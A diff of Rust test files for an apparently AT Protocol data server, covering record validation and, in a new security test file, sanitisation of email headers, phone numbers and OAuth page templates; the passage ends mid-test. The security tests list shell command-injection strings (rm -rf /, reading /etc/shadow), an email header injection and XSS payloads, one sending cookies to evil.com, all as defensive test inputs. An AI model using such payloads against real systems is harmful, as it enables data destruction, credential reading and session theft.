"langs": ["en", "fr", "de", "es"]
76
+
});
77
+
let result = validator.validate(&post, "app.bsky.feed.post");
78
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
79
+
}
80
+
81
+
#[test]
82
+
fn test_validate_post_three_langs_ok() {
83
+
let validator = RecordValidator::new();
84
+
let post = json!({
85
+
"$type": "app.bsky.feed.post",
86
+
"text": "Hello",
87
+
"createdAt": now(),
88
+
"langs": ["en", "fr", "de"]
89
+
});
90
+
let result = validator.validate(&post, "app.bsky.feed.post");
91
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
92
+
}
93
+
94
+
#[test]
95
+
fn test_validate_post_too_many_tags() {
96
+
let validator = RecordValidator::new();
97
+
let post = json!({
98
+
"$type": "app.bsky.feed.post",
99
+
"text": "Hello",
100
+
"createdAt": now(),
101
+
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
102
+
});
103
+
let result = validator.validate(&post, "app.bsky.feed.post");
104
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
105
+
}
106
+
107
+
#[test]
108
+
fn test_validate_post_eight_tags_ok() {
109
+
let validator = RecordValidator::new();
110
+
let post = json!({
111
+
"$type": "app.bsky.feed.post",
112
+
"text": "Hello",
113
+
"createdAt": now(),
114
+
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
115
+
});
116
+
let result = validator.validate(&post, "app.bsky.feed.post");
117
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
118
+
}
119
+
120
+
#[test]
121
+
fn test_validate_post_tag_too_long() {
122
+
let validator = RecordValidator::new();
123
+
let long_tag = "t".repeat(641);
124
+
let post = json!({
125
+
"$type": "app.bsky.feed.post",
126
+
"text": "Hello",
127
+
"createdAt": now(),
128
+
"tags": [long_tag]
129
+
});
130
+
let result = validator.validate(&post, "app.bsky.feed.post");
131
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
132
+
}
133
+
134
+
#[test]
135
+
fn test_validate_profile_valid() {
136
+
let validator = RecordValidator::new();
137
+
let profile = json!({
138
+
"$type": "app.bsky.actor.profile",
139
+
"displayName": "Test User",
140
+
"description": "A test user profile"
141
+
});
142
+
let result = validator.validate(&profile, "app.bsky.actor.profile");
143
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
144
+
}
145
+
146
+
#[test]
147
+
fn test_validate_profile_empty_ok() {
148
+
let validator = RecordValidator::new();
149
+
let profile = json!({
150
+
"$type": "app.bsky.actor.profile"
151
+
});
152
+
let result = validator.validate(&profile, "app.bsky.actor.profile");
153
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
154
+
}
155
+
156
+
#[test]
157
+
fn test_validate_profile_displayname_too_long() {
158
+
let validator = RecordValidator::new();
159
+
let long_name = "n".repeat(641);
160
+
let profile = json!({
161
+
"$type": "app.bsky.actor.profile",
162
+
"displayName": long_name
163
+
});
164
+
let result = validator.validate(&profile, "app.bsky.actor.profile");
165
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
166
+
}
167
+
168
+
#[test]
169
+
fn test_validate_profile_description_too_long() {
170
+
let validator = RecordValidator::new();
171
+
let long_desc = "d".repeat(2561);
172
+
let profile = json!({
173
+
"$type": "app.bsky.actor.profile",
174
+
"description": long_desc
175
+
});
176
+
let result = validator.validate(&profile, "app.bsky.actor.profile");
177
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
178
+
}
179
+
180
+
#[test]
181
+
fn test_validate_like_valid() {
182
+
let validator = RecordValidator::new();
183
+
let like = json!({
184
+
"$type": "app.bsky.feed.like",
185
+
"subject": {
186
+
"uri": "at://did:plc:test/app.bsky.feed.post/123",
187
+
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
188
+
},
189
+
"createdAt": now()
190
+
});
191
+
let result = validator.validate(&like, "app.bsky.feed.like");
192
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
193
+
}
194
+
195
+
#[test]
196
+
fn test_validate_like_missing_subject() {
197
+
let validator = RecordValidator::new();
198
+
let like = json!({
199
+
"$type": "app.bsky.feed.like",
200
+
"createdAt": now()
201
+
});
202
+
let result = validator.validate(&like, "app.bsky.feed.like");
203
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
204
+
}
205
+
206
+
#[test]
207
+
fn test_validate_like_missing_subject_uri() {
208
+
let validator = RecordValidator::new();
209
+
let like = json!({
210
+
"$type": "app.bsky.feed.like",
211
+
"subject": {
212
+
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
213
+
},
214
+
"createdAt": now()
215
+
});
216
+
let result = validator.validate(&like, "app.bsky.feed.like");
217
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
218
+
}
219
+
220
+
#[test]
221
+
fn test_validate_like_invalid_subject_uri() {
222
+
let validator = RecordValidator::new();
223
+
let like = json!({
224
+
"$type": "app.bsky.feed.like",
225
+
"subject": {
226
+
"uri": "https://example.com/not-at-uri",
227
+
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
228
+
},
229
+
"createdAt": now()
230
+
});
231
+
let result = validator.validate(&like, "app.bsky.feed.like");
232
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
233
+
}
234
+
235
+
#[test]
236
+
fn test_validate_repost_valid() {
237
+
let validator = RecordValidator::new();
238
+
let repost = json!({
239
+
"$type": "app.bsky.feed.repost",
240
+
"subject": {
241
+
"uri": "at://did:plc:test/app.bsky.feed.post/123",
242
+
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
243
+
},
244
+
"createdAt": now()
245
+
});
246
+
let result = validator.validate(&repost, "app.bsky.feed.repost");
247
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
248
+
}
249
+
250
+
#[test]
251
+
fn test_validate_repost_missing_subject() {
252
+
let validator = RecordValidator::new();
253
+
let repost = json!({
254
+
"$type": "app.bsky.feed.repost",
255
+
"createdAt": now()
256
+
});
257
+
let result = validator.validate(&repost, "app.bsky.feed.repost");
258
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
259
+
}
260
+
261
+
#[test]
262
+
fn test_validate_follow_valid() {
263
+
let validator = RecordValidator::new();
264
+
let follow = json!({
265
+
"$type": "app.bsky.graph.follow",
266
+
"subject": "did:plc:test12345",
267
+
"createdAt": now()
268
+
});
269
+
let result = validator.validate(&follow, "app.bsky.graph.follow");
270
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
271
+
}
272
+
273
+
#[test]
274
+
fn test_validate_follow_missing_subject() {
275
+
let validator = RecordValidator::new();
276
+
let follow = json!({
277
+
"$type": "app.bsky.graph.follow",
278
+
"createdAt": now()
279
+
});
280
+
let result = validator.validate(&follow, "app.bsky.graph.follow");
281
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
282
+
}
283
+
284
+
#[test]
285
+
fn test_validate_follow_invalid_subject() {
286
+
let validator = RecordValidator::new();
287
+
let follow = json!({
288
+
"$type": "app.bsky.graph.follow",
289
+
"subject": "not-a-did",
290
+
"createdAt": now()
291
+
});
292
+
let result = validator.validate(&follow, "app.bsky.graph.follow");
293
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
294
+
}
295
+
296
+
#[test]
297
+
fn test_validate_block_valid() {
298
+
let validator = RecordValidator::new();
299
+
let block = json!({
300
+
"$type": "app.bsky.graph.block",
301
+
"subject": "did:plc:blocked123",
302
+
"createdAt": now()
303
+
});
304
+
let result = validator.validate(&block, "app.bsky.graph.block");
305
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
306
+
}
307
+
308
+
#[test]
309
+
fn test_validate_block_invalid_subject() {
310
+
let validator = RecordValidator::new();
311
+
let block = json!({
312
+
"$type": "app.bsky.graph.block",
313
+
"subject": "not-a-did",
314
+
"createdAt": now()
315
+
});
316
+
let result = validator.validate(&block, "app.bsky.graph.block");
317
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
318
+
}
319
+
320
+
#[test]
321
+
fn test_validate_list_valid() {
322
+
let validator = RecordValidator::new();
323
+
let list = json!({
324
+
"$type": "app.bsky.graph.list",
325
+
"name": "My List",
326
+
"purpose": "app.bsky.graph.defs#modlist",
327
+
"createdAt": now()
328
+
});
329
+
let result = validator.validate(&list, "app.bsky.graph.list");
330
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
331
+
}
332
+
333
+
#[test]
334
+
fn test_validate_list_name_too_long() {
335
+
let validator = RecordValidator::new();
336
+
let long_name = "n".repeat(65);
337
+
let list = json!({
338
+
"$type": "app.bsky.graph.list",
339
+
"name": long_name,
340
+
"purpose": "app.bsky.graph.defs#modlist",
341
+
"createdAt": now()
342
+
});
343
+
let result = validator.validate(&list, "app.bsky.graph.list");
344
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
345
+
}
346
+
347
+
#[test]
348
+
fn test_validate_list_empty_name() {
349
+
let validator = RecordValidator::new();
350
+
let list = json!({
351
+
"$type": "app.bsky.graph.list",
352
+
"name": "",
353
+
"purpose": "app.bsky.graph.defs#modlist",
354
+
"createdAt": now()
355
+
});
356
+
let result = validator.validate(&list, "app.bsky.graph.list");
357
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
358
+
}
359
+
360
+
#[test]
361
+
fn test_validate_feed_generator_valid() {
362
+
let validator = RecordValidator::new();
363
+
let generator = json!({
364
+
"$type": "app.bsky.feed.generator",
365
+
"did": "did:web:example.com",
366
+
"displayName": "My Feed",
367
+
"createdAt": now()
368
+
});
369
+
let result = validator.validate(&generator, "app.bsky.feed.generator");
370
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
371
+
}
372
+
373
+
#[test]
374
+
fn test_validate_feed_generator_displayname_too_long() {
375
+
let validator = RecordValidator::new();
376
+
let long_name = "f".repeat(241);
377
+
let generator = json!({
378
+
"$type": "app.bsky.feed.generator",
379
+
"did": "did:web:example.com",
380
+
"displayName": long_name,
381
+
"createdAt": now()
382
+
});
383
+
let result = validator.validate(&generator, "app.bsky.feed.generator");
384
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
385
+
}
386
+
387
+
#[test]
388
+
fn test_validate_unknown_type_returns_unknown() {
389
+
let validator = RecordValidator::new();
390
+
let custom = json!({
391
+
"$type": "com.custom.record",
392
+
"data": "test"
393
+
});
394
+
let result = validator.validate(&custom, "com.custom.record");
395
+
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
396
+
}
397
+
398
+
#[test]
399
+
fn test_validate_unknown_type_strict_rejects() {
400
+
let validator = RecordValidator::new().require_lexicon(true);
401
+
let custom = json!({
402
+
"$type": "com.custom.record",
403
+
"data": "test"
404
+
});
405
+
let result = validator.validate(&custom, "com.custom.record");
406
+
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
407
+
}
408
+
409
+
#[test]
410
+
fn test_validate_type_mismatch() {
411
+
let validator = RecordValidator::new();
412
+
let record = json!({
413
+
"$type": "app.bsky.feed.like",
414
+
"subject": {"uri": "at://test", "cid": "bafytest"},
415
+
"createdAt": now()
416
+
});
417
+
let result = validator.validate(&record, "app.bsky.feed.post");
418
+
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
419
+
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
420
+
}
421
+
422
+
#[test]
423
+
fn test_validate_missing_type() {
424
+
let validator = RecordValidator::new();
425
+
let record = json!({
426
+
"text": "Hello"
427
+
});
428
+
let result = validator.validate(&record, "app.bsky.feed.post");
429
+
assert!(matches!(result, Err(ValidationError::MissingType)));
430
+
}
431
+
432
+
#[test]
433
+
fn test_validate_not_object() {
434
+
let validator = RecordValidator::new();
435
+
let record = json!("just a string");
436
+
let result = validator.validate(&record, "app.bsky.feed.post");
437
+
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
438
+
}
439
+
440
+
#[test]
441
+
fn test_validate_datetime_format_valid() {
442
+
let validator = RecordValidator::new();
443
+
let post = json!({
444
+
"$type": "app.bsky.feed.post",
445
+
"text": "Test",
446
+
"createdAt": "2024-01-15T10:30:00.000Z"
447
+
});
448
+
let result = validator.validate(&post, "app.bsky.feed.post");
449
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
450
+
}
451
+
452
+
#[test]
453
+
fn test_validate_datetime_with_offset() {
454
+
let validator = RecordValidator::new();
455
+
let post = json!({
456
+
"$type": "app.bsky.feed.post",
457
+
"text": "Test",
458
+
"createdAt": "2024-01-15T10:30:00+05:30"
459
+
});
460
+
let result = validator.validate(&post, "app.bsky.feed.post");
461
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
462
+
}
463
+
464
+
#[test]
465
+
fn test_validate_datetime_invalid_format() {
466
+
let validator = RecordValidator::new();
467
+
let post = json!({
468
+
"$type": "app.bsky.feed.post",
469
+
"text": "Test",
470
+
"createdAt": "2024/01/15"
471
+
});
472
+
let result = validator.validate(&post, "app.bsky.feed.post");
473
+
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
474
+
}
475
+
476
+
#[test]
477
+
fn test_validate_record_key_valid() {
478
+
assert!(validate_record_key("3k2n5j2").is_ok());
479
+
assert!(validate_record_key("valid-key").is_ok());
480
+
assert!(validate_record_key("valid_key").is_ok());
481
+
assert!(validate_record_key("valid.key").is_ok());
482
+
assert!(validate_record_key("valid~key").is_ok());
483
+
assert!(validate_record_key("self").is_ok());
484
+
}
485
+
486
+
#[test]
487
+
fn test_validate_record_key_empty() {
488
+
let result = validate_record_key("");
489
+
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
490
+
}
491
+
492
+
#[test]
493
+
fn test_validate_record_key_dot() {
494
+
assert!(validate_record_key(".").is_err());
495
+
assert!(validate_record_key("..").is_err());
496
+
}
497
+
498
+
#[test]
499
+
fn test_validate_record_key_invalid_chars() {
500
+
assert!(validate_record_key("invalid/key").is_err());
501
+
assert!(validate_record_key("invalid key").is_err());
502
+
assert!(validate_record_key("invalid@key").is_err());
503
+
assert!(validate_record_key("invalid#key").is_err());
504
+
}
505
+
506
+
#[test]
507
+
fn test_validate_record_key_too_long() {
508
+
let long_key = "k".repeat(513);
509
+
let result = validate_record_key(&long_key);
510
+
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
511
+
}
512
+
513
+
#[test]
514
+
fn test_validate_record_key_at_max_length() {
515
+
let max_key = "k".repeat(512);
516
+
assert!(validate_record_key(&max_key).is_ok());
517
+
}
518
+
519
+
#[test]
520
+
fn test_validate_collection_nsid_valid() {
521
+
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
522
+
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
523
+
assert!(validate_collection_nsid("a.b.c").is_ok());
524
+
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
525
+
}
526
+
527
+
#[test]
528
+
fn test_validate_collection_nsid_empty() {
529
+
let result = validate_collection_nsid("");
530
+
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
531
+
}
532
+
533
+
#[test]
534
+
fn test_validate_collection_nsid_too_few_segments() {
535
+
assert!(validate_collection_nsid("a").is_err());
536
+
assert!(validate_collection_nsid("a.b").is_err());
537
+
}
538
+
539
+
#[test]
540
+
fn test_validate_collection_nsid_empty_segment() {
541
+
assert!(validate_collection_nsid("a..b.c").is_err());
542
+
assert!(validate_collection_nsid(".a.b.c").is_err());
543
+
assert!(validate_collection_nsid("a.b.c.").is_err());
544
+
}
545
+
546
+
#[test]
547
+
fn test_validate_collection_nsid_invalid_chars() {
548
+
assert!(validate_collection_nsid("a.b.c/d").is_err());
549
+
assert!(validate_collection_nsid("a.b.c_d").is_err());
550
+
assert!(validate_collection_nsid("a.b.c@d").is_err());
551
+
}
552
+
553
+
#[test]
554
+
fn test_validate_threadgate() {
555
+
let validator = RecordValidator::new();
556
+
let gate = json!({
557
+
"$type": "app.bsky.feed.threadgate",
558
+
"post": "at://did:plc:test/app.bsky.feed.post/123",
559
+
"createdAt": now()
560
+
});
561
+
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
562
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
563
+
}
564
+
565
+
#[test]
566
+
fn test_validate_labeler_service() {
567
+
let validator = RecordValidator::new();
568
+
let labeler = json!({
569
+
"$type": "app.bsky.labeler.service",
570
+
"policies": {
571
+
"labelValues": ["spam", "nsfw"]
572
+
},
573
+
"createdAt": now()
574
+
});
575
+
let result = validator.validate(&labeler, "app.bsky.labeler.service");
576
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
577
+
}
578
+
579
+
#[test]
580
+
fn test_validate_list_item() {
581
+
let validator = RecordValidator::new();
582
+
let item = json!({
583
+
"$type": "app.bsky.graph.listitem",
584
+
"subject": "did:plc:test123",
585
+
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
586
+
"createdAt": now()
587
+
});
588
+
let result = validator.validate(&item, "app.bsky.graph.listitem");
589
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
590
+
}
-86
tests/relay_client.rs
-86
tests/relay_client.rs
···
1
-
mod common;
2
-
use common::*;
3
-
4
-
use axum::{extract::ws::Message, routing::get, Router};
5
-
use bspds::{
6
-
state::AppState,
7
-
sync::{firehose::SequencedEvent, relay_client::start_relay_clients},
8
-
};
9
-
use chrono::Utc;
10
-
use tokio::net::TcpListener;
11
-
use tokio::sync::mpsc;
12
-
13
-
async fn mock_relay_server(
14
-
listener: TcpListener,
15
-
event_tx: mpsc::Sender<Vec<u8>>,
16
-
connected_tx: mpsc::Sender<()>,
17
-
) {
18
-
let handler = |ws: axum::extract::ws::WebSocketUpgrade| async {
19
-
ws.on_upgrade(move |mut socket| async move {
20
-
let _ = connected_tx.send(()).await;
21
-
while let Some(Ok(msg)) = socket.recv().await {
22
-
if let Message::Binary(bytes) = msg {
23
-
let _ = event_tx.send(bytes.to_vec()).await;
24
-
break;
25
-
}
26
-
}
27
-
})
28
-
};
29
-
let app = Router::new().route("/", get(handler));
30
-
31
-
axum::serve(listener, app.into_make_service())
32
-
.await
33
-
.unwrap();
34
-
}
35
-
36
-
#[tokio::test]
37
-
async fn test_outbound_relay_client() {
38
-
let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
39
-
let addr = listener.local_addr().unwrap();
40
-
let (event_tx, mut event_rx) = mpsc::channel(1);
41
-
let (connected_tx, _connected_rx) = mpsc::channel::<()>(1);
42
-
tokio::spawn(mock_relay_server(listener, event_tx, connected_tx));
43
-
let relay_url = format!("ws://{}", addr);
44
-
45
-
let db_url = get_db_connection_string().await;
46
-
let pool = sqlx::postgres::PgPoolOptions::new()
47
-
.connect(&db_url)
48
-
.await
49
-
.unwrap();
50
-
let state = AppState::new(pool).await;
51
-
52
-
let (ready_tx, ready_rx) = mpsc::channel(1);
53
-
start_relay_clients(state.clone(), vec![relay_url], Some(ready_rx)).await;
54
-
55
-
tokio::time::timeout(
56
-
tokio::time::Duration::from_secs(5),
57
-
async {
58
-
ready_tx.closed().await;
59
-
}
60
-
)
61
-
.await
62
-
.expect("Timeout waiting for relay client to be ready");
63
-
64
-
let dummy_event = SequencedEvent {
65
-
seq: 1,
66
-
did: "did:plc:test".to_string(),
67
-
created_at: Utc::now(),
68
-
event_type: "commit".to_string(),
69
-
commit_cid: Some("bafyreihffx5a4o3qbv7vp6qmxpxok5mx5xvlsq6z4x3xv3zqv7vqvc7mzy".to_string()),
70
-
prev_cid: None,
71
-
ops: Some(serde_json::json!([])),
72
-
blobs: Some(vec![]),
73
-
blocks_cids: Some(vec![]),
74
-
};
75
-
state.firehose_tx.send(dummy_event).unwrap();
76
-
77
-
let received_bytes = tokio::time::timeout(
78
-
tokio::time::Duration::from_secs(5),
79
-
event_rx.recv()
80
-
)
81
-
.await
82
-
.expect("Timeout waiting for event")
83
-
.expect("Event channel closed");
84
-
85
-
assert!(!received_bytes.is_empty());
86
-
}
···
+377
tests/security_fixes.rs
+377
tests/security_fixes.rs
···
···
1
+
mod common;
2
+
3
+
use bspds::notifications::{
4
+
SendError, is_valid_phone_number, sanitize_header_value,
5
+
};
6
+
use bspds::oauth::templates::{login_page, error_page, success_page};
7
+
use bspds::image::{ImageProcessor, ImageError};
8
+
9
+
#[test]
10
+
fn test_sanitize_header_value_removes_crlf() {
11
+
let malicious = "Injected\r\nBcc: attacker@evil.com";
12
+
let sanitized = sanitize_header_value(malicious);
13
+
14
+
assert!(!sanitized.contains('\r'), "CR should be removed");
15
+
assert!(!sanitized.contains('\n'), "LF should be removed");
16
+
assert!(sanitized.contains("Injected"), "Original content should be preserved");
17
+
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
18
+
}
19
+
20
+
#[test]
21
+
fn test_sanitize_header_value_preserves_content() {
22
+
let normal = "Normal Subject Line";
23
+
let sanitized = sanitize_header_value(normal);
24
+
25
+
assert_eq!(sanitized, "Normal Subject Line");
26
+
}
27
+
28
+
#[test]
29
+
fn test_sanitize_header_value_trims_whitespace() {
30
+
let padded = " Subject ";
31
+
let sanitized = sanitize_header_value(padded);
32
+
33
+
assert_eq!(sanitized, "Subject");
34
+
}
35
+
36
+
#[test]
37
+
fn test_sanitize_header_value_handles_multiple_newlines() {
38
+
let input = "Line1\r\nLine2\nLine3\rLine4";
39
+
let sanitized = sanitize_header_value(input);
40
+
41
+
assert!(!sanitized.contains('\r'), "CR should be removed");
42
+
assert!(!sanitized.contains('\n'), "LF should be removed");
43
+
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
44
+
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
45
+
}
46
+
47
+
#[test]
48
+
fn test_email_header_injection_sanitization() {
49
+
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
50
+
let sanitized = sanitize_header_value(header_injection);
51
+
52
+
let lines: Vec<&str> = sanitized.split("\r\n").collect();
53
+
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
54
+
assert!(sanitized.contains("Normal Subject"), "Original content preserved");
55
+
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
56
+
assert!(sanitized.contains("X-Injected:"), "All content on same line");
57
+
}
58
+
59
+
#[test]
60
+
fn test_valid_phone_number_accepts_correct_format() {
61
+
assert!(is_valid_phone_number("+1234567890"));
62
+
assert!(is_valid_phone_number("+12025551234"));
63
+
assert!(is_valid_phone_number("+442071234567"));
64
+
assert!(is_valid_phone_number("+4915123456789"));
65
+
assert!(is_valid_phone_number("+1"));
66
+
}
67
+
68
+
#[test]
69
+
fn test_valid_phone_number_rejects_missing_plus() {
70
+
assert!(!is_valid_phone_number("1234567890"));
71
+
assert!(!is_valid_phone_number("12025551234"));
72
+
}
73
+
74
+
#[test]
75
+
fn test_valid_phone_number_rejects_empty() {
76
+
assert!(!is_valid_phone_number(""));
77
+
}
78
+
79
+
#[test]
80
+
fn test_valid_phone_number_rejects_just_plus() {
81
+
assert!(!is_valid_phone_number("+"));
82
+
}
83
+
84
+
#[test]
85
+
fn test_valid_phone_number_rejects_too_long() {
86
+
assert!(!is_valid_phone_number("+12345678901234567890123"));
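+
// 23 digits; E.164 numbers have at most 15 digits, so this should be rejected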
87
+
}
88
+
89
+
#[test]
90
+
fn test_valid_phone_number_rejects_letters() {
91
+
assert!(!is_valid_phone_number("+abc123"));
92
+
assert!(!is_valid_phone_number("+1234abc"));
93
+
assert!(!is_valid_phone_number("+a"));
94
+
}
95
+
96
+
#[test]
97
+
fn test_valid_phone_number_rejects_spaces() {
98
+
assert!(!is_valid_phone_number("+1234 5678"));
99
+
assert!(!is_valid_phone_number("+ 1234567890"));
100
+
assert!(!is_valid_phone_number("+1 "));
101
+
}
102
+
103
+
#[test]
104
+
fn test_valid_phone_number_rejects_special_chars() {
105
+
assert!(!is_valid_phone_number("+123-456-7890"));
106
+
assert!(!is_valid_phone_number("+1(234)567890"));
107
+
assert!(!is_valid_phone_number("+1.234.567.890"));
108
+
}
109
+
110
+
#[test]
111
+
fn test_signal_recipient_command_injection_blocked() {
112
+
let malicious_inputs = vec![
113
+
"+123; rm -rf /",
114
+
"+123 && cat /etc/passwd",
115
+
"+123`id`",
116
+
"+123$(whoami)",
117
+
"+123|cat /etc/shadow",
118
+
"+123\n--help",
119
+
"+123\r\n--version",
120
+
"+123--help",
121
+
];
122
+
123
+
for input in malicious_inputs {
124
+
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
125
+
}
126
+
}
127
+
128
+
#[test]
129
+
fn test_image_file_size_limit_enforced() {
130
+
let processor = ImageProcessor::new();
131
+
132
+
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
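+
// 11 MiB of zeroes, sized to exceed the processor's default file-size limit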
133
+
134
+
let result = processor.process(&oversized_data, "image/jpeg");
135
+
136
+
match result {
137
+
Err(ImageError::FileTooLarge { .. }) => {}
138
+
Err(other) => {
139
+
let msg = format!("{:?}", other);
140
+
if !msg.to_lowercase().contains("size") && !msg.to_lowercase().contains("large") {
141
+
panic!("Expected FileTooLarge error, got: {:?}", other);
142
+
}
143
+
}
144
+
Ok(_) => panic!("Should reject files over size limit"),
145
+
}
146
+
}
147
+
148
+
#[test]
149
+
fn test_image_file_size_limit_configurable() {
150
+
let processor = ImageProcessor::new().with_max_file_size(1024);
151
+
152
+
let data: Vec<u8> = vec![0u8; 2048];
153
+
154
+
let result = processor.process(&data, "image/jpeg");
155
+
156
+
assert!(result.is_err(), "Should reject files over configured limit");
157
+
}
158
+
159
+
#[test]
160
+
fn test_oauth_template_xss_escaping_client_id() {
161
+
let malicious_client_id = "<script>alert('xss')</script>";
162
+
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
163
+
164
+
assert!(!html.contains("<script>"), "Script tags should be escaped");
165
+
assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping");
166
+
}
167
+
168
+
#[test]
169
+
fn test_oauth_template_xss_escaping_client_name() {
170
+
let malicious_client_name = "<img src=x onerror=alert('xss')>";
171
+
let html = login_page("client123", Some(malicious_client_name), None, "test-uri", None, None);
172
+
173
+
assert!(!html.contains("<img "), "IMG tags should be escaped");
174
+
assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity");
175
+
}
176
+
177
+
#[test]
178
+
fn test_oauth_template_xss_escaping_scope() {
179
+
let malicious_scope = "\"><script>alert('xss')</script>";
180
+
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
181
+
182
+
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
183
+
}
184
+
185
+
#[test]
186
+
fn test_oauth_template_xss_escaping_error_message() {
187
+
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
188
+
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
189
+
190
+
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
191
+
}
192
+
193
+
#[test]
194
+
fn test_oauth_template_xss_escaping_login_hint() {
195
+
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
196
+
let html = login_page("client123", None, None, "test-uri", None, Some(malicious_hint));
197
+
198
+
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
199
+
assert!(html.contains("&quot;"), "Quotes should be escaped");
200
+
}
201
+
202
+
#[test]
203
+
fn test_oauth_template_xss_escaping_request_uri() {
204
+
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
205
+
let html = login_page("client123", None, None, malicious_uri, None, None);
206
+
207
+
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
208
+
}
209
+
210
+
#[test]
211
+
fn test_oauth_error_page_xss_escaping() {
212
+
let malicious_error = "<script>steal()</script>";
213
+
let malicious_desc = "<img src=x onerror=evil()>";
214
+
215
+
let html = error_page(malicious_error, Some(malicious_desc));
216
+
217
+
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
218
+
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
219
+
}
220
+
221
+
#[test]
222
+
fn test_oauth_success_page_xss_escaping() {
223
+
let malicious_name = "<script>steal_session()</script>";
224
+
225
+
let html = success_page(Some(malicious_name));
226
+
227
+
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
228
+
}
229
+
230
+
#[test]
231
+
fn test_oauth_template_no_javascript_urls() {
232
+
let html = login_page("client123", None, None, "test-uri", None, None);
233
+
assert!(!html.contains("javascript:"), "Login page should not contain javascript: URLs");
234
+
235
+
let error_html = error_page("test_error", None);
236
+
assert!(!error_html.contains("javascript:"), "Error page should not contain javascript: URLs");
237
+
238
+
let success_html = success_page(None);
239
+
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
240
+
}
241
+
242
+
#[test]
243
+
fn test_oauth_template_form_action_safe() {
244
+
let malicious_uri = "javascript:alert('xss')//";
245
+
let html = login_page("client123", None, None, malicious_uri, None, None);
246
+
247
+
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
248
+
}
249
+
250
+
#[test]
251
+
fn test_send_error_types_have_display() {
252
+
let timeout = SendError::Timeout;
253
+
let max_retries = SendError::MaxRetriesExceeded("test".to_string());
254
+
let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string());
255
+
256
+
assert!(!format!("{}", timeout).is_empty());
257
+
assert!(!format!("{}", max_retries).is_empty());
258
+
assert!(!format!("{}", invalid_recipient).is_empty());
259
+
}
260
+
261
+
#[test]
262
+
fn test_send_error_timeout_message() {
263
+
let error = SendError::Timeout;
264
+
let msg = format!("{}", error);
265
+
